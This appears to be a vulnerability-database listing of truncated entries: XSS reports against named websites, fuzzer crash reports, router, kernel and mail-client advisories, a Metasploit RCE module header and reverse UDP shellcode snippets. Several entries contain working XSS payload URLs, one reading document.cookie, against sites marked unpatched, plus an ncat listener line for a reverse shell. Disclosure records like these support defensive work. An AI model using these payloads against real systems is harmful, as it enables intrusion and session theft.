informationpackaging.ca XSS vulnerability

Vulnerable URL: http://www.informationpackaging.ca/send-page.php?url=/request-a-sample.php=%22%3E%3CimG/sRc=l%20oNerrOr=prompt/OPENBUGBOUNTY/%20x%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 06.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly...

openthread: Stack-buffer-overflow in ot::NetworkData::PrefixTlv::GetSubTlvs

Detailed report: https://oss-fuzz.com/testcase?key=5490815742771200 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthread Platform Id: linux Crash Type: Stack-buffer-overflow READ 1 Crash Address: 0x7fb823a8eb22 Crash...

zdravskolhb.cz XSS vulnerability

Vulnerable URL: http://www.zdravskolhb.cz/scripts/formsend.php?email=zdravskol@zdravskol%27%22%3E%3Cscript%3Ealert/OPENBUGBOUNTY/;%3C/script%3Ehb.cz=prihlasky-na-zkousky/=true=500=300 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 14.12.2017 Vulnerability type:| XSS...

openthread: Stack-buffer-overflow in ot::MeshCoP::CommissionerSessionIdTlv::GetCommissionerSessionId

Project: https://github.com/openthread/openthread.git Detailed report: https://oss-fuzz.com/testcase?key=6738146924429312 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthread Platform Id: linux Crash Type:...

D-Link DIR-850L REV.B Privilege Acquisition Vulnerability (CNVD-2017-31792)

The D-Link DIR-850L REV.B is a wireless router from AUO D-Link. A security vulnerability exists in the registersend.php file in D-Link DIR-850L REV.B devices using firmware FW208WWb02 and prior versions, which stems from the program failing to require authentication. An attacker could exploit the...

Trend Micro Control Manager - ImportFile Directory Traversal RCE Exploit

Exploit for windows platform in category remote exploits require 'msf/core' require 'msf/core/exploit/phpexe' class MetasploitModule 'Trend Micro Control Manager importFile Directory Traversal RCE', 'Description' = %q This module exploits a directory traversal vulnerability found in Trend Micro...

PT-2017-13461 · D Link · D-Link Dir-850L

Name of the Vulnerable Software and Affected Versions: D-Link DIR-850L REV. B versions through FW208WWb02 Description: The issue concerns the register send.php file, which does not require authentication. This can lead to unintended enrollment in mydlink Cloud Services. Recommendations: For D-Lin...

openthread: Stack-buffer-overflow in ot::MeshCoP::CommissionerSessionIdTlv::GetCommissionerSessionId

Project: https://github.com/openthread/openthread.git Detailed report: https://oss-fuzz.com/testcase?key=4750024565063680 Project: openthread Fuzzer: libFuzzeropenthreadip6-send-fuzzer Fuzz target binary: ip6-send-fuzzer Job Type: libfuzzerasanopenthreaduntrusted Platform Id: linux Crash Type:...

collegesearch.in XSS vulnerability

Vulnerable URL: https://www.collegesearch.in/send-profile.php?instituteid=2405%22%3E%3Ch1%3EM0ns7er%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C/br%3E%3Cimg%20src=%22https://images.cooltext.com/4956678.gif%22%20width=%22166%22%20height=%2270%22%20alt=%22m0ns7er%22%20/%3E Details...

kernel: net: IPv6 fragmentation implementation of nexthdr field may be associated with an invalid option

The IPv6 fragmentation implementation in the Linux kernel does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service out-of-bounds read and BUG or possibly have unspecified other impact via crafted socket and send syste...

Updated kmail(kdepimlibs4) packages fix security vulnerability and bugs

The kdepimlibs4, kdepim4, kdepim4-runtime, and akonadi packages have been updated to include the latest bug fixes from upstream. This includes a fix for an issue where the Send Later function in kmail would cause an e-mail that had been designated to be sent encrypted would be sent in plain text...

Cross site request forgery (csrf)

In SimpleRisk 20170614-001, a CSRF attack on reset.php aka the Send Password Reset Email form can insert XSS sequences via the user parameter...

taokaenoi.co.th XSS vulnerability

Vulnerable URL: http://www.taokaenoi.co.th/sendtofriend.php Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 718048 VIP website status:| No Check taokaenoi.co.th SSL connection:|...

The vulnerability of the sock_setsockopt function in the kernel of the Linux operating system’s net/core/sock.c file allows a hacker to cause a service failure or exert other effects.

The vulnerability of the socksetsockopt function in the kernel’s net/core/sock.c file in the Linux operating system arises from the execution of an operation beyond the buffer boundaries in memory. Exploiting this vulnerability allows a local attacker to cause a service failure or other adverse...

openSUSE Security Update : kdepim4 (openSUSE-2017-755)

This update for kdepim4 fixes the following issues : - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210 The package kdepim-addons was updated to conflict with 4.x based akonadi package to prevent file conflicts. boo1045936 %NASLMINLEVEL 703...

OPENSUSE-SU-2017:1756-1 Security update for kdepim, messagelib

This update for kdepim and messagelib fixes the following issues: - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210...

OPENSUSE-SU-2017:1748-1 Security update for kdepim, messagelib

This update for kdepim and messagelib fixes the following issues: - CVE-2017-9604: The kmail 'send later' function does not have 'sign/encryption' action ensured. boo1044210...

BSA-2017-317

Security Advisory ID : BSA-2017-317 Component : Apache Tomcat Revision : 2.0: Interim In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was...

Linux/x86 - Reverse UDP Shellcode (668 bytes)

; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might contains null byte if you use certain ip / address %define htonsx x 8 & 0xFF | x & 0x...

Linux/x86 - Reverse UDP Shellcode (668 bytes)

Linux/x86 - Reverse UDP Shellcode 668 bytes. Shellcode exploit for Linx86 platform ; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might...